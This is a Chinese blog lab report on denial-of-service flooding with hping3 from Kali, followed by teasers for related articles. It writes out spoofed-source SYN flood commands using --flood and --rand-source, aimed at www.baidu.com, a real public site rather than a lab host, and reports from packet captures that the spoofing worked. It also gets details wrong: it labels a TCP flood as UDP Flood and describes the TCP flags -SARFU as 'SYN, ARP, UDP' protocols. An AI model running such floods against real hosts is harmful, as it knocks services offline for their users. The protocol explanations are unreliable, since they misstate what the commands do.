实验四 拒绝服务攻击

最新推荐文章于 2024-06-14 16:36:53 发布
最新推荐文章于 2024-06-14 16:36:53 发布
阅读量2.6k 收藏 36
点赞数 2
分类专栏: 网络攻防对抗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43774515/article/details/118937074
版权
本文通过kali系统使用hping3工具进行了UDPFlood攻击的实战演练,包括SYN数据包伪造、随机源IP发送大量数据包以及混合协议攻击。实验展示了如何成功伪造IP并耗尽网络资源,揭示了拒绝服务攻击的原理,特别是UDP无连接特性在DDoS攻击中的应用。
摘要由CSDN通过智能技术生成

实验目的

UDP Flood攻击练习

实验内容

实验环境:kali IP:192.168.91.129

1.hping3

1.1 hping3 -S -a 1.1.1.1 -V www.baidu.com #发送SYN数据包,伪造IP来源为1.1.1.1

-a 为伪造IP地址来源
-V冗余模式
-S 发送SYN数据包
–flood 只发数据包,不考虑数据入站回显
启动wireshark抓包查看伪造的IP 1.1.1.1是否生效
抓包
在这里插入图片描述
在这里插入图片描述
通过对数据分析可以看到成功的伪造了数据包的来源,并且在不断的向外发送数据包。

1.2 hping3 -S -V –flood –rand-source -c 10000 -d 150 -w 64 -p 80 www.baidu.com
-c 10000 发送数据包数量
-d 150 发送的每个数据包的大小
-w 64 TCP窗口的大小
-p 80 攻击目的端口
–ran-source 使用随记性源IP地址

在这里插入图片描述
抓包
在这里插入图片描述
可以看到伪造的IP地址发送的数据包的数量
在这里插入图片描述
1.3 hping3 -SARFU -V –flood –rand-source -c 10000 -d 150 -w 64 -p 80 www.baidu.com
-SARFU 发送SYN、ARP、UDP等不同协议的数据包
在这里插入图片描述
抓包
在这里插入图片描述

实验结论

拒绝服务攻击即攻击者想办法让目标机器停止提供服务。常见为消耗宽带、CPU、内存资源(各种洪水攻击)。导致延长服务器响应时间。利用服务漏洞,攻陷服务。IP欺骗等。
UDP Flooding攻击: UDP是一个无连接的传输层协议,所以在数据传输过程,不需要建立连接和进行认证。攻击者只需要向目标发送大量巨大的UDP数据包,就会使目标所在的网络资源被耗尽。
攻击者使用源IP欺骗的方法向有漏洞的UDP服务器发送伪造请求。UDP服务器不知道请求是伪造的,就会响应。当成干上万的响应被传递给一个不知情的目标主机时,这个攻击问题就会发生。

0935
关注
专栏目录
实验拒绝服务攻击与防范
08-12
在这篇实验报告中,我们将学习拒绝服务攻击(DoS)和分布式拒绝服务攻击(DDoS)的原理和防范方法。我们将通过一个 SYN Flood 的拒绝服务程序,探索 DoS 攻击的机理和防范方法,并了解 DDoS 攻击的原理和防范方法。 ...
拒绝服务攻击
m0_71230077的博客
06-02 1357
原理:伪造大量的数据包(源MAC地址和目的MAC地址都是随机构造的)发送到交换机,很快将交换机CAM表填满,交换机退化为集线器。做法:向目标主机不断发送“死亡之ping”(如65500字节的数据包),目标主机处理请求和应答,消耗目标主机的资源。我们采用第二种方法----hping3是一款用于生成和解析TCP/IP数据包的开源工具,可以实现拒绝服务攻击。(2)32位windows 7的IP: 192.168.17.128。(2)eNSP中PC1的IP: 192.168.17.101。
TCP拒绝服务攻击简述与实验
HEAVEN569的博客
02-28 3858
一、TCP拒绝服务攻击简述 拒绝服务(DoS)攻击即是攻击者想办法让目标机器停止提供服务,是黑客常用的攻击手段之一。其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分,只要能够对目标造成麻烦,使某些服务被暂停甚至主机死机,都属于拒绝服务攻击拒绝服务攻击问题也一直得不到合理的解决,究其原因是因为网络协议本身的安全缺陷,从而拒绝服务攻击也成为了攻击者的终极手法。攻击者进行拒绝服务攻击,实际上让服务器实现两种效果:一是迫使服务器的缓冲区满,不接收新的请求;二是使用IP欺骗,迫使服务器把非...
网络安全 - DDoS 攻击原理 + 实验
最新发布
z339521的博客
06-14 2106
DDoSDDoS(Distributed Denial of Service,分布式拒绝服务攻击是一种通过多个计算机系统同时向目标系统发送大量请求,消耗其资源,使其无法正常服务的攻击方式。DDoS 攻击通常利用受感染的僵尸网络(botnet),由攻击者远程控制多个受感染的计算机同时发起攻击
信息安全原理与技术第八次实验拒绝服务攻击与防范
sjx3161的博客
06-04 2954
为了帮助同学们完成痛苦的实验课程设计,本作者将其作出的实验结果及代码贴至CSDN中,供同学们学习参考。如有不足或描述不完善之处,敬请各位指出,欢迎各位的斧正!通过本实验的学习,使大家了解拒绝服务攻击的原理以及相应的防范方法。通过一个SYN Flood 的拒绝服务程序,使大家加强对 DoS 攻击的理解。 通过本实验的学习,使大家了解分布式拒绝服务(DDoS)攻击的原理以及相应的防范方法。1.TCP 协议介绍 TCP(Transmission Control Protocol,传输控制协议)是用来在不可靠的因特
拒绝服务攻击实验
qq_52506562的博客
10-20 2450
SYN泛洪利用的是TCP协议的三步握手机制,攻击者利用伪造的IP地址向目标系统发出TCP连接请求,目标系统发出的响应报文得不到被伪造IP地址的响应,从而无法完成TCP的三步握手,此时目标系统将一直等待最后一次握手消息的到来直到超时,即半开连接。如果攻击者在较短的时间内发送大量伪造的IP地址的TCP连接请求,则目标系统将存在大量的半开连接,占用目标系统的资源,如果半开连接的数量超过了目标系统的上限,目标系统资源耗尽,从而达到拒绝服务的目的。kali(192.168.157.2)(攻击机)
Kali渗透测试:拒绝服务攻击
Liu_Bruce的博客
05-31 4875
故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击拒绝服务攻击是指攻击者想办法让目标停止提供服务,是黑客常用的攻击手段之一。其实对网络带宽进行的消耗性攻击知识拒绝服务攻击的一小部分,只要能够对目标造成麻烦,事情某些服务暂停甚至是主机死机,都属于拒绝服务攻击拒绝服务攻击一直得不到合理的解决,究其原因是网络协议本身的安全缺陷,使得拒绝服务攻击也成了攻击者的“终极手段”。实际上,拒绝服务攻击并不是一种攻击方式,而是一类具有相似特征的攻击方式的集合。黑客可能利用TCP/IP模型中的
网络攻击与防范 拒绝服务攻击实验.docx
09-30
网络攻击与防范 拒绝服务攻击实验 本文档对拒绝服务攻击(Denial of Service,DoS)进行了实验和分析,介绍了SYN Flood攻击的原理和过程,并对防范措施进行了讨论。 一、拒绝服务攻击的定义和原理 拒绝服务攻击是...
信息安全拒绝服务攻击实验
12-14
信息安全拒绝服务攻击
网络安全-拒绝服务攻击技术-实验报告-北京航空航天大学
03-31
北京航空航天大学信息对抗技术专业本科生《网络攻防实验》课程实验报告
使用hping3进行Dos攻击实验(安装+攻击保姆级教程)
m0_74806866的博客
12-02 5861
对hping3的安装和使用进行了一个简单的介绍,和一个简单的攻击实验
拒绝服务攻击检测》实验步骤 北京邮电大学
weixin_43580791的博客
05-08 2166
睡不着觉,写了该实验的详细实验步骤,我奶奶看了都会做。
dos攻击 --hping3
qq_65880213的博客
05-12 763
dos使用hping3攻击
UDP Flood 攻击实验
cooper的笔记本
03-06 1243
UDP Flood 攻击实验
Hping3 拒绝服务攻击手册
重启专家的博客
11-07 4571
Hping3 拒绝服务攻击手册 Hping3使用指南 hping 是 面向命令行的用于生成和解析TCP/IP协议数据包汇编/分析的开源工具。它支持TCP,UDP,ICMP和RAW-IP协议,具有跟踪路由模式,能够在覆盖的信道之间发送文件以及许多其他功能,支持使用tcl脚本自动化地调用其API。hping是安全审计、防火墙测试等工作的标配工具。hping 优势在于能够定制数据包的各个部分,因此用户可以灵活对目标机进行细致地探测。 主要功能 防火墙测试 高级端口扫描 网络测试,使用不同的协议,TOS,分片 手
【渗透测试笔记】之【拒绝服务攻击】_拒绝服务攻击的代码(1)
2401_84971562的博客
05-13 376
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
【系统安全学习3】拒绝服务攻击
yummy11111的博客
03-27 2990
拒绝服务攻击 一、实验目的: 掌握TCP洪水攻击、UDP洪水攻击、HTTP请求洪水攻击拒绝服务攻击的基本原理。 学会使用LOIC等软件实现拒绝服务攻击。 了解拒绝服务攻击的危害,掌握拒绝服务攻击的症状以及检测方法。 二、实验环境: 操作系统:客户机操作系统 Windows XP; 服务器操作系统 Windows Server 2008; 工具软件:LOIC,Wireshark。 三、实验步骤: LOIC软件的安装使用 安装好1. LOIC软件之后就进行实验 TCP请求洪水攻击的实现 ① 在url处输入
网络安全实验之《拒绝服务攻击检测》实验报告
7xun's space
04-16 1963
根据拒绝服务攻击的原理:“拒绝服务攻击是针对网络应用有限数量的服务能力,发起大规模的网络服务的请求,耗尽网络应用能够提供的服务计算资源等,使网络应用无法对正常用户的请求进行服务,实现拒绝服务。这些知识是从课本上学不到的,正所谓“纸上得来终觉浅,绝知此事要躬行”。可以看到,日志文件中触发网络攻击告警信息的检测规则的编号与配置的检测规则的编号相同,也与wireshark捕获的包的特征相同。同时,在进行实验的过程中,我也遇到了许多问题,在解决这些问题的过程中,我也收获了许多,学习到了很多。
以太坊拒绝服务攻击检测技术探究
"这篇本科毕业论文详细探讨了以太坊拒绝服务攻击的检测技术,涵盖了以太坊的基础知识、DoS攻击的概述、攻击案例分析,以及基于不同方法的检测技术,包括传统的检测技术、机器学习和区块链技术。此外,论文还设计了一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值